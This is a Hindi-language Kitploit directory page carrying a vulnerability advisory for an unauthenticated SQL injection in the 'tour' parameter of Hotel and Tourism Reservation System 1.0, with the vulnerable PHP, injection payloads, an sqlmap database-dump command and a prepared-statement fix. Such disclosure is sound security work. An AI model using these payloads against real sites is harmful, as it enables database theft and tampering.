Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-10290-SQLI — होटल और पर्यटन आरक्षण प्रणाली 1.0 में बिना प्रमाणीकरण के SQL इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट, जो tour पैरामीटर के माध्यम से डेटाबेस निष्कर्षण का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/xmyronn/cve-2026-10290-sqli
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाडेटाबेस सुरक्षा
GitHubxmyronn/cve-2026-10290-sqli

CVE-2026-10290-SQLI

होटल और पर्यटन आरक्षण प्रणाली 1.0 में बिना प्रमाणीकरण के SQL इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट, जो tour पैरामीटर के माध्यम से डेटाबेस निष्कर्षण का प्रदर्शन करता है।

रिपॉजिटरी देखें
23 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Hotel and Tourism Reservation System - tour.php में बिना प्रमाणीकरण के SQL Injection

भेद्यता विवरण

फ़ील्डविवरण
शीर्षकHotel and Tourism Reservation System - tour GET पैरामीटर के माध्यम से SQL Injection
विक्रेताcode-projects.org
विक्रेता URLhttps://code-projects.org/hotel-and-tourism-reservation-in-php-with-source-code/
उत्पादHotel and Tourism Reservation System
संस्करण1.0
भेद्यता प्रकारSQL Injection
CWECWE-89
CVSS स्कोर9.8 (गंभीर)
CVSS वेक्टरCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
प्रभावित फ़ाइल/ht/tour.php
प्रभावित पैरामीटरtour (GET)
प्रमाणीकरण आवश्यकनहीं
रिमोट से शोषण योग्यहाँ
शोधकर्ताSyed Imad Uddin Alvi

विवरण

Hotel and Tourism Reservation System 1.0 के tour.php में tour GET पैरामीटर में एक गंभीर SQL Injection भेद्यता मौजूद है। यह पैरामीटर बिना किसी सैनिटाइज़ेशन, बिना prepared statements और बिना इनपुट सत्यापन के सीधे एक raw SQL क्वेरी में पारित किया जाता है। एक बिना प्रमाणीकरण वाला रिमोट हमलावर डेटाबेस में किसी भी डेटा को निकालने, संशोधित करने या हटाने के लिए क्वेरी में हेरफेर कर सकता है। इस भेद्यता की पुष्टि sqlmap का उपयोग करके पूर्ण डेटाबेस डंप द्वारा की गई थी।

tour.php में असुरक्षित कोड:

root@kitploit:~
if(isset($_GET['tour'])) {
    $tourID = $_GET['tour'];
    $select = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");
    $s = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");
    $data = mysqli_fetch_assoc($s);

$tourID को सीधे $_GET['tour'] से लिया जाता है और बिना किसी सैनिटाइज़ेशन के SQL क्वेरी में इंटरपोलेट किया जाता है।


पुनरुत्पादन के चरण

सेटअप: XAMPP पर Hotel and Tourism Reservation System 1.0 इंस्टॉल करें और http://<target>/ht/ पर एक्सेस करें

चरण 1 — बिना प्रमाणीकरण वाले उपयोगकर्ता के रूप में किसी भी tour पेज पर जाएँ:

root@kitploit:~
http://<target>/ht/tour.php?tour=4
Screenshot 2026-05-12 001635

चरण 2 — SQL क्वेरी को तोड़ने और भेद्यता की पुष्टि करने के लिए एक single quote इंजेक्ट करें:

root@kitploit:~
http://<target>/ht/tour.php?tour='

परिणाम: Fatal MySQL त्रुटि उत्पन्न होती है — पुष्टि होती है कि बिना सैनिटाइज़ किया गया इनपुट SQL क्वेरी तक पहुँचता है।

Screenshot 2026-05-12 001643

चरण 3 — boolean-आधारित पेलोड के साथ SQLi की पुष्टि करें:

root@kitploit:~
http://<target>/ht/tour.php?tour=' or 1=1 -- -

परिणाम: पेज tour डेटा के साथ सामान्य रूप से लोड होता है — boolean injection सफल।

Screenshot 2026-05-12 001654

चरण 4 — sqlmap का उपयोग करके पूरे डेटाबेस को डंप करें:

root@kitploit:~
sqlmap -r sqli.txt --dump --batch

परिणाम: sqlmap hotel_db में सभी टेबलों को सफलतापूर्वक डंप करता है, जिनमें users, rooms, tour_reserves, gallery शामिल हैं — पूर्ण डेटाबेस समझौता पुष्ट।

Screenshot 2026-05-12 001722

प्रभाव

एक बिना प्रमाणीकरण वाला रिमोट हमलावर निम्न कार्य कर सकता है:

  • डेटाबेस से सभी डेटा निकाल सकता है, जिसमें उपयोगकर्ता क्रेडेंशियल, ईमेल, फ़ोन नंबर और आरक्षण विवरण शामिल हैं
  • एडमिन क्रेडेंशियल निकालकर प्रमाणीकरण को बायपास कर सकता है
  • किसी भी डेटाबेस रिकॉर्ड को संशोधित या हटा सकता है
  • यदि फ़ाइल विशेषाधिकार प्रदान किए गए हैं तो INTO OUTFILE के माध्यम से संभावित रूप से Remote Code Execution प्राप्त कर सकता है

मूल कारण

tour GET पैरामीटर को बिना prepared statements, parameterized queries या इनपुट सैनिटाइज़ेशन के उपयोग के सीधे एक raw SQL क्वेरी में इंटरपोलेट किया जाता है:

root@kitploit:~
// VULNERABLE
$tourID = $_GET['tour'];
$select = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");

// FIXED — use prepared statements
$stmt = $db->prepare("SELECT * FROM tourism WHERE id = ?");
$stmt->bind_param("i", $_GET['tour']);
$stmt->execute();

संदर्भ

  • CWE-89: SQL कमांड में प्रयुक्त विशेष तत्वों का अनुचित न्यूट्रलाइज़ेशन
  • OWASP: SQL Injection
  • Hotel and Tourism Reservation System — code-projects.org

खोजकर्ता

Syed Imad Uddin Alvi — स्वतंत्र सुरक्षा शोधकर्ता

टूल डाउनलोड करें